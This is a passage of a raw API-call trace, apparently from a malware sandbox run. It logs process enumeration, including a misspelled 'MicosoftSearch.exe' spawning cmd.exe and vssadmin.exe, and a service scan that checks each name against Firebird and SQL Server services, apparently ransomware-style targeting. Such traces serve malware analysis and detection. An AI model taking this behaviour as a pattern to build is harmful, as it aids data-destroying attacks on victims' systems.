cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0044.647] lstrlenW (lpString="newly debut.exe") returned 15 [0044.647] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0044.648] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0044.648] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0044.649] lstrlenW (lpString="archive.exe") returned 11 [0044.649] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0044.650] lstrlenW (lpString="defend.exe") returned 10 [0044.650] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0044.650] lstrlenW (lpString="arservice.exe") returned 13 [0044.650] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0044.651] lstrlenW (lpString="rr-programmer.exe") returned 17 [0044.651] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0044.652] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0044.652] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0044.653] lstrlenW (lpString="twistedmonton.exe") returned 17 [0044.653] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0044.653] lstrlenW (lpString="arc plains.exe") returned 14 [0044.653] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0044.654] lstrlenW (lpString="americahousestip.exe") returned 20 [0044.654] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0044.655] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0044.655] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0044.656] lstrlenW (lpString="medical lectures.exe") returned 20 [0044.656] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0044.656] lstrlenW (lpString="electronic.exe") returned 14 [0044.656] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0044.657] lstrlenW (lpString="regression.exe") returned 14 [0044.657] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0044.658] lstrlenW (lpString="county.exe") returned 10 [0044.658] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0044.659] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0044.659] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0044.659] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0044.659] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0044.660] lstrlenW (lpString="cmd.exe") returned 7 [0044.660] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0044.661] lstrlenW (lpString="conhost.exe") returned 11 [0044.661] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0044.662] lstrlenW (lpString="vssadmin.exe") returned 12 [0044.662] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0044.662] lstrlenW (lpString="VSSVC.exe") returned 9 [0044.662] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.663] lstrlenW (lpString="svchost.exe") returned 11 [0044.663] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0044.664] CloseHandle (hObject=0x1b0) returned 1 [0044.664] Sleep (dwMilliseconds=0x1f4) [0045.492] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232e28 [0045.493] EnumServicesStatusExW (in: hSCManager=0x4232e28, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0045.494] GetLastError () returned 0xea [0045.494] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xba5bf8 [0045.494] EnumServicesStatusExW (in: hSCManager=0x4232e28, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xba5bf8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xba5bf8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0045.495] CloseServiceHandle (hSCObject=0x4232e28) returned 1 [0045.495] lstrlenW (lpString="Appinfo") returned 7 [0045.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0045.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0045.495] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0045.495] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0045.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0045.495] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0045.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0045.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0045.496] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0045.496] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0045.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0045.496] lstrlenW (lpString="AudioSrv") returned 8 [0045.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0045.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0045.496] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0045.496] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0045.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0045.496] lstrlenW (lpString="BFE") returned 3 [0045.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0045.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0045.496] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0045.496] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0045.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0045.496] lstrlenW (lpString="CryptSvc") returned 8 [0045.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0045.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0045.496] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0045.496] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0045.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0045.496] lstrlenW (lpString="CscService") returned 10 [0045.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0045.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0045.496] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0045.496] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0045.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0045.496] lstrlenW (lpString="DcomLaunch") returned 10 [0045.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0045.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0045.496] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0045.496] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0045.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0045.497] lstrlenW (lpString="Dhcp") returned 4 [0045.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0045.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0045.497] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0045.497] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0045.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0045.497] lstrlenW (lpString="Dnscache") returned 8 [0045.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0045.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0045.497] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0045.497] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0045.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0045.497] lstrlenW (lpString="DPS") returned 3 [0045.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0045.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0045.497] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0045.497] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0045.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0045.497] lstrlenW (lpString="eventlog") returned 8 [0045.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0045.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0045.497] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0045.497] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0045.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0045.497] lstrlenW (lpString="EventSystem") returned 11 [0045.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0045.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0045.497] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0045.497] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0045.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0045.497] lstrlenW (lpString="gpsvc") returned 5 [0045.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0045.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0045.497] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0045.498] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0045.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0045.498] lstrlenW (lpString="iphlpsvc") returned 8 [0045.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0045.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0045.498] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0045.498] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0045.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0045.498] lstrlenW (lpString="LanmanServer") returned 12 [0045.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0045.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0045.498] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0045.498] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0045.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0045.498] lstrlenW (lpString="LanmanWorkstation") returned 17 [0045.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0045.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0045.498] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0045.498] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0045.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0045.498] lstrlenW (lpString="lmhosts") returned 7 [0045.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0045.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0045.498] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0045.498] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0045.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0045.498] lstrlenW (lpString="MMCSS") returned 5 [0045.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0045.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0045.498] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0045.498] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0045.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0045.498] lstrlenW (lpString="MpsSvc") returned 6 [0045.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0045.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0045.499] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0045.499] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0045.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0045.499] lstrlenW (lpString="Netman") returned 6 [0045.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0045.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0045.499] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0045.499] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0045.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0045.499] lstrlenW (lpString="netprofm") returned 8 [0045.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0045.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0045.499] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0045.499] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0045.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0045.499] lstrlenW (lpString="NlaSvc") returned 6 [0045.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0045.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0045.499] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0045.499] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0045.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0045.499] lstrlenW (lpString="nsi") returned 3 [0045.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0045.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0045.499] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0045.499] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0045.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0045.499] lstrlenW (lpString="PcaSvc") returned 6 [0045.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0045.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0045.499] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0045.499] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0045.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0045.500] lstrlenW (lpString="PlugPlay") returned 8 [0045.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0045.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0045.500] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0045.500] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0045.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0045.500] lstrlenW (lpString="Power") returned 5 [0045.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0045.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0045.500] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0045.500] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0045.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0045.500] lstrlenW (lpString="ProfSvc") returned 7 [0045.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0045.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0045.500] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0045.500] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0045.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0045.500] lstrlenW (lpString="RpcEptMapper") returned 12 [0045.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0045.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0045.500] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0045.500] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0045.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0045.500] lstrlenW (lpString="RpcSs") returned 5 [0045.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0045.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0045.500] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0045.500] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0045.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0045.500] lstrlenW (lpString="SamSs") returned 5 [0045.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0045.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0045.500] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0045.500] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0045.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0045.501] lstrlenW (lpString="Schedule") returned 8 [0045.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0045.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0045.501] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0045.501] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0045.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0045.501] lstrlenW (lpString="SENS") returned 4 [0045.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0045.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0045.501] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0045.501] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0045.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0045.501] lstrlenW (lpString="ShellHWDetection") returned 16 [0045.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0045.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0045.501] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0045.501] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0045.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0045.501] lstrlenW (lpString="Spooler") returned 7 [0045.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0045.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0045.501] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0045.501] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0045.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0045.501] lstrlenW (lpString="swprv") returned 5 [0045.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0045.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0045.501] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0045.501] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0045.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0045.501] lstrlenW (lpString="SysMain") returned 7 [0045.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0045.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0045.502] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0045.502] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0045.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0045.502] lstrlenW (lpString="Themes") returned 6 [0045.502] 